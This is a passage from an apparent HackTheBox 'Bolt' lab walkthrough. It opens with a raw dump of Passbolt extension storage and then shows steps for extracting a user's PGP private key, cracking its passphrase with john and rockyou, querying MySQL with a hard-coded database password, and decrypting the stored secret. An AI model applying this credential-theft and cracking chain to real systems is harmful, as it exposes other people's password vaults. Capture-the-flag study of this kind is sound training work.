cyEc7wNb5p1PEsui/Xv7N5HRocp1ni1w5k66BjKwMGnc48+x1nGPaP0\\r\\n4LYAjomyQpRLxFucKtx8UTa26bWWe59BSMGjND8cGdi3FiWBPmaSzp4+E1r0\\r\\nAJ2SHGJEZJXIeyASrWbvXMByxrVGgXBR6NHfl5e9rGDZcwo0R8LbbuACf7/F\\r\\nsRIKSwmIaLpmsTgEW9d8FdjM6Enm7nCObJnQOpzzGbHbIMxySaCso/eZDX3D\\r\\nR50E9IFLqf+Au+2UTUhlloPnIEcp7xV75txkLm6YUAhMUyLn51pGsQloUZ6L\\r\\nZ8gbvveCudfCIYF8cZzZbCB3vlVkPOBSl6GwOg9FHAVS0jY=\\r\\n=FBUR\\r\\n-----END PGP PUBLIC KEY BLOCK-----\\r\\n\",\"keyId\":\"56a16c84\",\"userIds\":[{\"name\":\"Passbolt Server Key\",\"email\":\"admin@bolt.htb\"}],\"fingerprint\":\"59860a269e803fa094416753ab8e2efb56a16c84\",\"created\":\"Wed Feb 24 2021 12:15:49 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":3072,\"private\":false,\"user_id\":\"ba192ac8-99c0-3c89-a36f-a6094f5b9391\"},\"4e184ee6-e436-47fb-91c9-dccb57f250bc\":{\"key\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\nxsBNBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi\\r\\nfjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk\\r\\ncpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU\\r\\nRNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU\\r\\n+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a\\r\\nIf70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB\\r\\nAAHNHkVkZGllIEpvaG5zb24gPGVkZGllQGJvbHQuaHRiPsLAjQQQAQgAIAUC\\r\\nYDgbYQYLCQcIAwIEFQgKAgQWAgEAAhkBAhsDAh4BACEJEBwnQaPcO0q9FiEE\\r\\n30Jrx6Sor1jlDtoOHCdBo9w7Sr35DQf9HZOFYE3yug2TuEJY7q9QfwNrWhfJ\\r\\nHmOwdM1kCKV5XnBic356DF/ViT3+pcWfIbWT8giYIZ/2qYfAd74S+gMKBim8\\r\\nwBAH0J7WcnUI+py/zXxapGxBF0ufJtqrHmPaKsNaQVCEV3dDzTqlVRi0vfOD\\r\\nCm6kt3E8f8GPYK9Mh21gPjnhoPE1s23NzmBUiDt6wjZ2dOQ2cVagVnf6PyHM\\r\\nWZLqUm8nQY342t3+AA6SFTw/YpwPPvjtZBBHf95BrSbpCE5Bjar9UyB+14x6\\r\\nOUcWhkJu7QgySrCwAg2aKIBzsfWovcVTe9Rkpq/ty1tYOklT9kn75D9ttDF4\\r\\nU8+Qz61kTICf987ATQRgOBthAQgAmlgcw3DqVzEBa5k9djPsUTJWOKVY5uox\\r\\noBp6X0H9njR9Ufb2XtmxZUUdV/uhtbnM0lSlNkeNNBX4c/Qny88vfkgb66xc\\r\\noOo4q+fNCEZfCmcS2AwMsUlzaPDQjowp4V+mWSc8JXq4GXOd/mrooibtiEdt\\r\\nvK4pzMdvwGCykFqugyRDLksc1hfDYU+s5R42TNiMdW7OwYAplnOjgExOH8f1\\r\\nlXVkqbsq5p54TbHe+0SdlfH5pJf4Gfwqj6dQlkSf3DMeEnByxEZX3imeKGrC\\r\\nUmwLN4NHMeUs5EXuLnufut9aTMhbw/tetTtUXTHFk/zc7EhZDR1d3mkDV83c\\r\\ntEUh6BuElwARAQABwsB2BBgBCAAJBQJgOBthAhsMACEJEBwnQaPcO0q9FiEE\\r\\n30Jrx6Sor1jlDtoOHCdBo9w7Sr3+HQf/Qhrj6znyGkLbj9uUv0S1Q5fFx78z\\r\\n5qEXRe4rvFC3APYE8T5/AzW7XWRJxRxzgDQB5yBRoGEuL49w4/UNwhGUklb8\\r\\nIOuffRTHMPZxs8qVToKoEL/CRpiFHgoqQ9dJPJx1u5vWAX0AdOMvcCcPfVjc\\r\\nPyHN73YWejb7Ji82CNtXZ1g9vO7D49rSgLoSNAKghJIkcG+GeAkhoCeU4BjC\\r\\n/NdSM65Kmps6XOpigRottd7WB+sXpd5wyb+UyptwBsF7AISYycPvStDDQESg\\r\\npmGRRi3bQP6jGo1uP/k9wye/WMD0DrQqxch4lqCDk1n7OFIYlCSBOHU0rE/1\\r\\ntD0sGGFpQMsI+Q==\\r\\n=+pbw\\r\\n-----END PGP PUBLIC KEY BLOCK-----\\r\\n\",\"keyId\":\"dc3b4abd\",\"userIds\":[{\"name\":\"Eddie Johnson\",\"email\":\"eddie@bolt.htb\"}],\"fingerprint\":\"df426bc7a4a8af58e50eda0e1c2741a3dc3b4abd\",\"created\":\"Thu Feb 25 2021 14:49:21 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":2048,\"private\":false,\"user_id\":\"4e184ee6-e436-47fb-91c9-dccb57f250bc\"}}"}_passbolt_dataQ{"config":{"user.firstname":"Eddie","user.id":"4e184ee6-e436-47fb-91c9-dccb57f250bc","user.lastname":"Johnson","user.settings.securityToken.code":"GOZ","user.settings.securityToken.color":"#607d8b","user.settings.securityToken.textColor":"#ffffff","user.settings.trustedDomain":"https://passbolt.bolt.htb","user.username":"eddie@bolt.htb"},"passbolt-private-gpgkeys":"{\"MY_KEY_ID\":{\"key\":\"[Redacted: PGP private-key material from the authorized lab has been removed from this archive.]\\r\\n\",\"keyId\":\"dc3b4abd\",\"userIds\":[{\"name\":\"Eddie Johnson\",\"email\":\"eddie@bolt.htb\"}],\"fingerprint\":\"df426bc7a4a8af58e50eda0e1c2741a3dc3b4abd\",\"created\":\"Thu Feb 25 2021 14:49:21 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":2048,\"private\":true,\"user_id\":\"MY_KEY_ID\"}}","passbolt-public-gpgkeys":"{\"ba192ac8-99c0-3c89-a36f-a6094f5b9391\":{\"key\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\n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\\r\\n=FBUR\\r\\n-----END PGP PUBLIC KEY BLOCK-----\\r\\n\",\"keyId\":\"56a16c84\",\"userIds\":[{\"name\":\"Passbolt Server Key\",\"email\":\"admin@bolt.htb\"}],\"fingerprint\":\"59860a269e803fa094416753ab8e2efb56a16c84\",\"created\":\"Wed Feb 24 2021 12:15:49 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":3072,\"private\":false,\"user_id\":\"ba192ac8-99c0-3c89-a36f-a6094f5b9391\"},\"4e184ee6-e436-47fb-91c9-dccb57f250bc\":{\"key\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\nxsBNBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi\\r\\nfjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk\\r\\ncpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU\\r\\nRNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU\\r\\n+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a\\r\\nIf70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB\\r\\nAAHNHkVkZGllIEpvaG5zb24gPGVkZGllQGJvbHQuaHRiPsLAjQQQAQgAIAUC\\r\\nYDgbYQYLCQcIAwIEFQgKAgQWAgEAAhkBAhsDAh4BACEJEBwnQaPcO0q9FiEE\\r\\n30Jrx6Sor1jlDtoOHCdBo9w7Sr35DQf9HZOFYE3yug2TuEJY7q9QfwNrWhfJ\\r\\nHmOwdM1kCKV5XnBic356DF/ViT3+pcWfIbWT8giYIZ/2qYfAd74S+gMKBim8\\r\\nwBAH0J7WcnUI+py/zXxapGxBF0ufJtqrHmPaKsNaQVCEV3dDzTqlVRi0vfOD\\r\\nCm6kt3E8f8GPYK9Mh21gPjnhoPE1s23NzmBUiDt6wjZ2dOQ2cVagVnf6PyHM\\r\\nWZLqUm8nQY342t3+AA6SFTw/YpwPPvjtZBBHf95BrSbpCE5Bjar9UyB+14x6\\r\\nOUcWhkJu7QgySrCwAg2aKIBzsfWovcVTe9Rkpq/ty1tYOklT9kn75D9ttDF4\\r\\nU8+Qz61kTICf987ATQRgOBthAQgAmlgcw3DqVzEBa5k9djPsUTJWOKVY5uox\\r\\noBp6X0H9njR9Ufb2XtmxZUUdV/uhtbnM0lSlNkeNNBX4c/Qny88vfkgb66xc\\r\\noOo4q+fNCEZfCmcS2AwMsUlzaPDQjowp4V+mWSc8JXq4GXOd/mrooibtiEdt\\r\\nvK4pzMdvwGCykFqugyRDLksc1hfDYU+s5R42TNiMdW7OwYAplnOjgExOH8f1\\r\\nlXVkqbsq5p54TbHe+0SdlfH5pJf4Gfwqj6dQlkSf3DMeEnByxEZX3imeKGrC\\r\\nUmwLN4NHMeUs5EXuLnufut9aTMhbw/tetTtUXTHFk/zc7EhZDR1d3mkDV83c\\r\\ntEUh6BuElwARAQABwsB2BBgBCAAJBQJgOBthAhsMACEJEBwnQaPcO0q9FiEE\\r\\n30Jrx6Sor1jlDtoOHCdBo9w7Sr3+HQf/Qhrj6znyGkLbj9uUv0S1Q5fFx78z\\r\\n5qEXRe4rvFC3APYE8T5/AzW7XWRJxRxzgDQB5yBRoGEuL49w4/UNwhGUklb8\\r\\nIOuffRTHMPZxs8qVToKoEL/CRpiFHgoqQ9dJPJx1u5vWAX0AdOMvcCcPfVjc\\r\\nPyHN73YWejb7Ji82CNtXZ1g9vO7D49rSgLoSNAKghJIkcG+GeAkhoCeU4BjC\\r\\n/NdSM65Kmps6XOpigRottd7WB+sXpd5wyb+UyptwBsF7AISYycPvStDDQESg\\r\\npmGRRi3bQP6jGo1uP/k9wye/WMD0DrQqxch4lqCDk1n7OFIYlCSBOHU0rE/1\\r\\ntD0sGGFpQMsI+Q==\\r\\n=+pbw\\r\\n-----END PGP PUBLIC KEY BLOCK-----\\r\\n\",\"keyId\":\"dc3b4abd\",\"userIds\":[{\"name\":\"Eddie Johnson\",\"email\":\"eddie@bolt.htb\"}],\"fingerprint\":\"df426bc7a4a8af58e50eda0e1c2741a3dc3b4abd\",\"created\":\"Thu Feb 25 2021 14:49:21 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":2048,\"private\":false,\"user_id\":\"4e184ee6-e436-47fb-91c9-dccb57f250bc\"}}"} resourcesresourceTypes>@)0auth_statususersgroupsrolesauth_status.{"isAuthenticated":true,"isMfaRequired":false} resources[{"created":"2021-02-25T21:50:11+00:00","created_by":"4e184ee6-e436-47fb-91c9-dccb57f250bc","deleted":false,"description":null,"favorite":null,"id":"cd0270db-c83f-4f44-b7ac-76609b397746","modified":"2021-02-25T21:50:11+00:00","modified_by":"4e184ee6-e436-47fb-91c9-dccb57f250bc","name":"localhost","permission":{"aco":"Resource","aco_foreign_key":"cd0270db-c83f-4f44-b7ac-76609b397746","aro":"User","aro_foreign_key":"4e184ee6-e436-47fb-91c9-dccb57f250bc","created":"2021-02-25T21:50:11+00:00","id":"2627a60d-85d5-4df6-b94d-60c6b32fc525","modified":"2021-02-25T21:50:11+00:00","type":15},"resource_type_id":"a28a04cd-6f53-518a-967c-9963bf9cec51","uri":"","username":"root"}]resourceTypes[{"created":"2021-02-25T21:40:29+00:00","definition":{"resource":{"properties":{"description":{"anyOf":[{"maxLength":10000,"type":"string"},{"type":"null"}]},"name":{"maxLength":64,"type":"string"},"uri":{"anyOf":[{"maxLength":1024,"type":"string"},{"type":"null"}]},"username":{"anyOf":[{"maxLength":64,"type":"string"},{"type":"null"}]}},"required":["name"],"type":"object"},"secret":{"maxLength":4064,"type":"string"}},"description":"The original passbolt resource type, where the secret is a non empty string.","id":"669f8c64-242a-59fb-92fc-81f660975fd3","modified":"2021-02-25T21:40:29+00:00","name":"Simple password","slug":"password-string"},{"created":"2021-02-25T21:40:29+00:00","definition":{"resource":{"properties":{"name":{"maxLength":64,"type":"string"},"uri":{"anyOf":[{"maxLength":1024,"type":"string"},{"type":"null"}]},"username":{"anyOf":[{"maxLength":64,"type":"string"},{"type":"null"}]}},"required":["name"],"type":"object"},"secret":{"properties":{"description":{"anyOf":[{"maxLength":10000,"type":"string"},{"type":"null"}]},"password":{"maxLength":4064,"type":"string"}},"required":["password"],"type":"object"}},"description":"A resource with the password and the description encrypted.","id":"a28a04cd-6f53-518a-967c-9963bf9cec51","modified":"2021-02-25T21:40:29+00:00","name":"Password with description","slug":"password-and-description"}]roles[{"created":"2012-07-04T13:39:25+00:00","description":"Super Administrator","id":"0bfa69ec-8dde-4984-b9e7-4dc37fdec27c","modified":"2012-07-04T13:39:25+00:00","name":"root"},{"created":"2012-07-04T13:39:25+00:00","description":"Non logged in user","id":"10b6aca4-67a8-401e-b3b8-9ee0570bbb17","modified":"2012-07-04T13:39:25+00:00","name":"guest"},{"created":"2012-07-04T13:39:25+00:00","description":"Logged in user","id":"1cfcd300-0664-407e-85e6-c11664a7d86c","modified":"2012-07-04T13:39:25+00:00","name":"user"},{"created":"2012-07-04T13:39:25+00:00","description":"Organization administrator","id":"975b9a56-b1b1-453c-9362-c238a85dad76","modified":"2012-07-04T13:39:25+00:00","name":"admin"}]/groupsusers[{"active":true,"created":"2021-02-25T21:42:50+00:00","deleted":false,"id":"4e184ee6-e436-47fb-91c9-dccb57f250bc","last_logged_in":"2021-02-25T21:49:39+00:00","modified":"2021-02-25T21:55:06+00:00","profile":{"avatar":{"created":"2021-02-25T21:55:06+00:00","id":"fe5ffd32-1d48-428d-b27a-c4e0650902af","modified":"2021-02-25T21:55:06+00:00","url":{"medium":"img/public/Avatar/17/d4/9a/fe5ffd321d48428db27ac4e0650902af/fe5ffd321d48428db27ac4e0650902af.a99472d5.jpg","small":"img/public/Avatar/17/d4/9a/fe5ffd321d48428db27ac4e0650902af/fe5ffd321d48428db27ac4e0650902af.65a0ba70.jpg"}},"created":"2021-02-25T21:42:50+00:00","first_name":"Eddie","id":"13d7b7c4-917e-48ee-9560-f022c89b2895","last_name":"Johnson","modified":"2021-02-25T21:55:06+00:00","user_id":"4e184ee6-e436-47fb-91c9-dccb57f250bc"},"role_id":"1cfcd300-0664-407e-85e6-c11664a7d86c","username":"eddie@bolt.htb"},{"active":true,"created":"2021-02-25T21:40:29+00:00","deleted":false,"id":"9d8a0452-53dc-4640-b3a7-9a3d86b0ff90","last_logged_in":"2021-02-25T21:41:47+00:00","modified":"2021-02-25T21:42:32+00:00","profile":{"avatar":{"created":"2021-02-25T21:42:32+00:00","id":"3cbdcc78-5d89-4a7a-92e2-4dc1e63b7da3","modified":"2021-02-25T21:42:32+00:00","url":{"medium":"img/public/Avatar/38/a2/10/3cbdcc785d894a7a92e24dc1e63b7da3/3cbdcc785d894a7a92e24dc1e63b7da3.a99472d5.jpg","small":"img/public/Avatar/38/a2/10/3cbdcc785d894a7a92e24dc1e63b7da3/3cbdcc785d894a7a92e24dc1e63b7da3.65a0ba70.jpg"}},"created":"2021-02-25T21:40:29+00:00","first_name":"Clark","id":"99cfb365-869d-42ec-9f6e-6883e7e41b4f","last_name":"Griswold","modified":"2021-02-25T21:42:32+00:00","user_id":"9d8a0452-53dc-4640-b3a7-9a3d86b0ff90"},"role_id":"975b9a56-b1b1-453c-9362-c238a85dad76","username":"clark@bolt.htb"}]hauth_status/{"isAuthenticated":false,"isMfaRequired":false} resourcesferesourceTypesauth_status3users*Mgroupsjcrolesauth_status.{"isAuthenticated":true,"isMfaRequired":false}-resourceTypes[{"created":"2021-02-25T21:40:29+00:00","definition":{"resource":{"properties":{"description":{"anyOf":[{"maxLength":10000,"type":"string"},{"type":"null"}]},"name":{"maxLength":64,"type":"string"},"uri":{"anyOf":[{"maxLength":1024,"type":"string"},{"type":"null"}]},"username":{"anyOf":[{"maxLength":64,"type":"string"},{"type":"null"}]}},"required":["name"],"type":"object"},"secret":{"maxLength":4064,"type":"string"}},"description":"The original passbolt resource type, where the secret is a non empty string.","id":"669f8c64-242a-59fb-92fc-81f660975fd3","modified":"2021-02-25T21:40:29+00:00","name":"Simple password","slug":"password-string"},{"created":"2021-02-25T21:40:29+00:00","definition":{"resource":{"properties":{"name":{"maxLength":64,"type":"string"},"uri":{"anyOf":[{"maxLength":1024,"type":"string"},{"type":"null"}]},"username":{"anyOf":[{"maxLength":64,"type":"string"},{"type":"null"}]}},"required":["name"],"type":"object"},"secret":{"properties":{"description":{"anyOf":[{"maxLength":10000,"type":"string"},{"type":"null"}]},"password":{"maxLength":4064,"type":"string"}},"required":["password"],"type":"object"}},"description":"A resource with the password and the description encrypted.","id":"a28a04cd-6f53-518a-967c-9963bf9cec51","modified":"2021-02-25T21:40:29+00:00","name":"Password with description","slug":"password-and-description"}]roles[{"created":"2012-07-04T13:39:25+00:00","description":"Super Administrator","id":"0bfa69ec-8dde-4984-b9e7-4dc37fdec27c","modified":"2012-07-04T13:39:25+00:00","name":"root"},{"created":"2012-07-04T13:39:25+00:00","description":"Non logged in user","id":"10b6aca4-67a8-401e-b3b8-9ee0570bbb17","modified":"2012-07-04T13:39:25+00:00","name":"guest"},{"created":"2012-07-04T13:39:25+00:00","description":"Logged in user","id":"1cfcd300-0664-407e-85e6-c11664a7d86c","modified":"2012-07-04T13:39:25+00:00","name":"user"},{"created":"2012-07-04T13:39:25+00:00","description":"Organization administrator","id":"975b9a56-b1b1-453c-9362-c238a85dad76","modified":"2012-07-04T13:39:25+00:00","name":"admin"}] resources[{"created":"2021-02-25T21:50:11+00:00","created_by":"4e184ee6-e436-47fb-91c9-dccb57f250bc","deleted":false,"description":null,"favorite":null,"id":"cd0270db-c83f-4f44-b7ac-76609b397746","modified":"2021-02-25T21:50:11+00:00","modified_by":"4e184ee6-e436-47fb-91c9-dccb57f250bc","name":"localhost","permission":{"aco":"Resource","aco_foreign_key":"cd0270db-c83f-4f44-b7ac-76609b397746","aro":"User","aro_foreign_key":"4e184ee6-e436-47fb-91c9-dccb57f250bc","created":"2021-02-25T21:50:11+00:00","id":"2627a60d-85d5-4df6-b94d-60c6b32fc525","modified":"2021-02-25T21:50:11+00:00","type":15},"resource_type_id":"a28a04cd-6f53-518a-967c-9963bf9cec51","uri":"","username":"root"}]dgroupsusers[{"active":true,"created":"2021-02-25T21:42:50+00:00","deleted":false,"id":"4e184ee6-e436-47fb-91c9-dccb57f250bc","last_logged_in":"2021-02-25T22:31:58+00:00","modified":"2021-02-25T21:55:06+00:00","profile":{"avatar":{"created":"2021-02-25T21:55:06+00:00","id":"fe5ffd32-1d48-428d-b27a-c4e0650902af","modified":"2021-02-25T21:55:06+00:00","url":{"medium":"img/public/Avatar/17/d4/9a/fe5ffd321d48428db27ac4e0650902af/fe5ffd321d48428db27ac4e0650902af.a99472d5.jpg","small":"img/public/Avatar/17/d4/9a/fe5ffd321d48428db27ac4e0650902af/fe5ffd321d48428db27ac4e0650902af.65a0ba70.jpg"}},"created":"2021-02-25T21:42:50+00:00","first_name":"Eddie","id":"13d7b7c4-917e-48ee-9560-f022c89b2895","last_name":"Johnson","modified":"2021-02-25T21:55:06+00:00","user_id":"4e184ee6-e436-47fb-91c9-dccb57f250bc"},"role_id":"1cfcd300-0664-407e-85e6-c11664a7d86c","username":"eddie@bolt.htb"},{"active":true,"created":"2021-02-25T21:40:29+00:00","deleted":false,"id":"9d8a0452-53dc-4640-b3a7-9a3d86b0ff90","last_logged_in":"2021-02-25T21:41:47+00:00","modified":"2021-02-25T21:42:32+00:00","profile":{"avatar":{"created":"2021-02-25T21:42:32+00:00","id":"3cbdcc78-5d89-4a7a-92e2-4dc1e63b7da3","modified":"2021-02-25T21:42:32+00:00","url":{"medium":"img/public/Avatar/38/a2/10/3cbdcc785d894a7a92e24dc1e63b7da3/3cbdcc785d894a7a92e24dc1e63b7da3.a99472d5.jpg","small":"img/public/Avatar/38/a2/10/3cbdcc785d894a7a92e24dc1e63b7da3/3cbdcc785d894a7a92e24dc1e63b7da3.65a0ba70.jpg"}},"created":"2021-02-25T21:40:29+00:00","first_name":"Clark","id":"99cfb365-869d-42ec-9f6e-6883e7e41b4f","last_name":"Griswold","modified":"2021-02-25T21:42:32+00:00","user_id":"9d8a0452-53dc-4640-b3a7-9a3d86b0ff90"},"role_id":"975b9a56-b1b1-453c-9362-c238a85dad76","username":"clark@bolt.htb"}]auth_status/{"isAuthenticated":false,"isMfaRequired":false}A$ resources$resourceTypesauth_statususersgroupsJroleseddie@bolt:~$

Why: The passbolt security whitepaper explicitly warns that the private key is stored in the browser extension’s local storage. If an attacker has filesystem access, they can read it. We have filesystem access as eddie.

Why Chrome extension storage? Passbolt is a browser extension password manager. It stores your PGP private key locally so it can decrypt passwords from the server. The key lives in a LevelDB file (.log) that strings can read.

Hacker mindset: Know your targets. Reading the passbolt whitepaper (referenced in the machine’s lore) tells you exactly where the key lives. Attackers read documentation to understand how systems work and where secrets are stored.

We transfer the key to our kali machine:

HackTheBox “Bolt” Walkthrough, figure 24
HackTheBox “Bolt” Walkthrough, figure 25

Step 14: Extract and Clean the Key

The key was embedded in JSON with \\r\\n as escaped line endings (double-backslash sequences). We used Python to:
1. Transfer the raw log file via netcat
2. Replace the 6-byte escape sequences \\r\\n with real newlines

Python code:

python3 << ‘EOF’ 
import re

data = open(‘eddie.key’, ‘rb’).read().decode(‘utf-8’, errors=’ignore’)

m = re.search(r’ — — -[Redacted: retired-lab private key header] BLOCK — — -.*? — — -END PGP PRIVATE KEY BLOCK — — -’, data, re.DOTALL) 
if not m: 
 print(“private key not found”) 
 exit(1)

key = m.group(0).replace(r’\r\n’, ‘\n’) 
open(‘eddie_private.key’, ‘w’).write(key) 
print(“saved eddie_private.key”) 
EOF 
saved eddie_private.key
head -n 5 eddie_private.key

HackTheBox “Bolt” Walkthrough, figure 26

cat > fix_key.py << ‘EOF’ 
data = open(‘eddie_private.key’,’rb’).read()
data = data.replace(b’\\\\r\\\\n’, b’\n’)
open(‘eddie_fixed.key’,’wb’).write(data)
EOF

python fix_key.py

head -n 5 eddie_fixed.key

gpg2john eddie_fixed.key > eddie.john

john eddie.john — wordlist=/usr/share/wordlists/rockyou.txt

HackTheBox “Bolt” Walkthrough, figure 27

Why: The LevelDB log stores JSON, and JSON escapes newlines as \n. When those JSON strings are themselves stored in another JSON layer (the extension’s config), they get double-escaped to \\r\\n. We need to unescape them to get a valid PGP key file that GPG can read.

Step 15: Crack the PGP Key PassphraseResult: merrychristmas

Why: PGP private keys are encrypted with a passphrase. John the Ripper has a GPG cracking mode. With the key converted to john’s hash format via gpg2john, we can dictionary attack the passphrase.

Hacker mindset: Any protected secret is only as strong as its passphrase. merrychristmas is a weak passphrase that appears in rockyou. Users choose memorable passphrases, and memorable often means guessable.

Step 16: Get the Encrypted Secret from passbolt Database

Python code run on target as eddie:
import subprocess
r = subprocess.run(
 [‘mysql’, ‘-u’, ‘passbolt’, ‘-prT2;jW7<eY8!dX8}pQ8%’, ‘passboltdb’, ‘ — raw’, ‘-N’, ‘-e’,
 “select data from secrets where user_id=’4e184ee6-e436–47fb-91c9-dccb57f250bc’;”],
 capture_output=True)
with open(‘/tmp/secret.asc’, ‘wb’) as f:
 f.write(r.stdout)

HackTheBox “Bolt” Walkthrough, figure 28

Now, we send the secret file back to our kali.

HackTheBox “Bolt” Walkthrough, figure 29

Why: passbolt stores passwords encrypted with the user’s PGP public key in the database. Only the holder of the corresponding private key can decrypt them. We now have both the private key AND its passphrase, so we can decrypt.

Why Python instead of mysql CLI directly? The mysql terminal output garbles binary/multi-line data when the TTY isn’t fully set up. Python’s subprocess captures the raw bytes cleanly.

Step 17: Import Key and Decrypt the Secret

Commands:
gpg — batch — import eddie_clean.key
gpg — pinentry-mode loopback — passphrase merrychristmas -d secret.asc
